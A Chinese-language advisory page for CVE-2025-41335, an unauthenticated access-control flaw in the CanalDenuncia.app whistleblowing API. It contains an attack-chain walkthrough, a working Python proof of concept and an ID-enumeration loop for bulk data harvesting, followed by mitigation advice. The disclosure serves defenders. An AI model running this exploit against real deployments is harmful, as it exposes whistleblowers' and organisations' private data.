CVE-2025-41335: CanalDenuncia.app 授权缺失漏洞允许未授权访问用户信息

漏洞信息

漏洞编号

CVE-2025-41335

漏洞类型

授权缺失/访问控制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CanalDenuncia.app

漏洞概述

CVE-2025-41335是发现于CanalDenuncia.app应用中的一个严重授权缺失漏洞（Broken Access Control）。该漏洞存在于应用程序的API接口中，特别是'/api/buscarEmpresaById.php'端点。攻击者可以通过构造恶意的POST请求，利用该接口中存在的参数'id'和'id_sociedad'来绕过正常的授权检查机制，从而未经授权地访问其他用户的敏感信息。CanalDenuncia.app是一个专门用于接收和处理举报信息的平台，通常被企业和组织用于内部举报和投诉处理。由于该平台存储了大量敏感的用户和举报信息，一旦攻击者成功利用此漏洞，将可能导致大量个人隐私数据泄露，包括举报人信息、被举报人信息以及相关企业数据等。此漏洞的CVSS评分为7.5，属于高危级别，其攻击复杂度低，无需认证和用户交互即可实现，攻击者可以直接通过网络发起攻击，对系统的机密性造成严重影响。

技术细节

该漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control类别。具体技术细节如下：漏洞位置位于CanalDenuncia.app的API端点'/api/buscarEmpresaById.php'。该接口在设计时未对用户请求进行充分的权限验证，允许攻击者通过直接调用API接口并传入任意用户ID参数来获取对应用户的数据。攻击者利用的参数包括：'id'参数用于指定目标用户标识，'id_sociedad'参数用于指定社会/公司标识。由于服务端未验证当前认证用户是否有权限访问指定ID对应的数据，攻击者可以通过遍历不同的ID值来批量获取系统中所有用户的信息。攻击者无需获取任何有效的认证凭据，只需构造标准的HTTP POST请求即可触发漏洞。请求中需要包含正确的参数名和目标URL，服务端会返回对应ID的用户信息，包括可能包含的个人身份信息、企业数据等敏感内容。这种类型的漏洞通常是由于开发人员在实现业务逻辑时过于依赖客户端提供的数据，或者未在后端实现充分的对象级别访问控制（Object Level Access Control）。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标应用CanalDenuncia.app，并发现存在/api/buscarEmpresaById.php端点

STEP 2

步骤2: 构建攻击请求

攻击者构造恶意的HTTP POST请求，包含'id'和'id_sociedad'参数，无需任何认证信息

STEP 3

步骤3: 发送恶意请求

攻击者直接向目标API端点发送POST请求，服务端由于缺少授权检查而处理请求

STEP 4

步骤4: 获取敏感数据

服务端返回指定ID对应的用户信息，攻击者成功获取其他用户的敏感数据

STEP 5

步骤5: 数据滥用

攻击者可以批量遍历用户ID，收集大量用户隐私信息，用于后续攻击或数据贩卖

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-41335 PoC - CanalDenuncia.app Authorization Bypass
# Target: /api/buscarEmpresaById.php endpoint

def exploit_cve_2025_41335(target_url, user_id, sociedad_id):
    """
    Exploit for CVE-2025-41335: Broken Access Control in CanalDenuncia.app
    Allows unauthorized access to user information via id and id_sociedad parameters
    """
    endpoint = f"{target_url}/api/buscarEmpresaById.php"
    
    # Construct malicious POST request
    payload = {
        'id': user_id,
        'id_sociedad': sociedad_id
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Sending request to {endpoint}")
        print(f"[*] Payload: id={user_id}, id_sociedad={sociedad_id}")
        
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response:\n{response.text}")
        
        return response.json() if response.headers.get('content-type', '').startswith('application/json') else response.text
    
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def enumerate_users(target_url, max_id=100):
    """
    Enumerate all users by iterating through ID values
    """
    print(f"[*] Starting user enumeration (max ID: {max_id})")
    
    for user_id in range(1, max_id + 1):
        for sociedad_id in range(1, 10):
            result = exploit_cve_2025_41335(target_url, str(user_id), str(sociedad_id))
            if result:
                print(f"[!] Found data for User ID: {user_id}, Sociedad ID: {sociedad_id}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <user_id> <sociedad_id>")
        print(f"Example: python {sys.argv[0]} http://target.com 1 1")
        sys.exit(1)
    
    target = sys.argv[1]
    uid = sys.argv[2]
    sid = sys.argv[3]
    
    exploit_cve_2025_41335(target, uid, sid)

影响范围

CanalDenuncia.app (所有版本)

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1) 通过Web应用防火墙（WAF）规则限制对/api/buscarEmpresaById.php端点的访问；2) 实施IP白名单或地理限制；3) 临时禁用受影响的API端点；4) 加强日志监控，及时发现异常访问模式；5) 对所有API端点实施强制认证要求；6) 限制API请求频率以防止自动化数据抓取；7) 与INCIBE-CERT联系获取官方安全建议。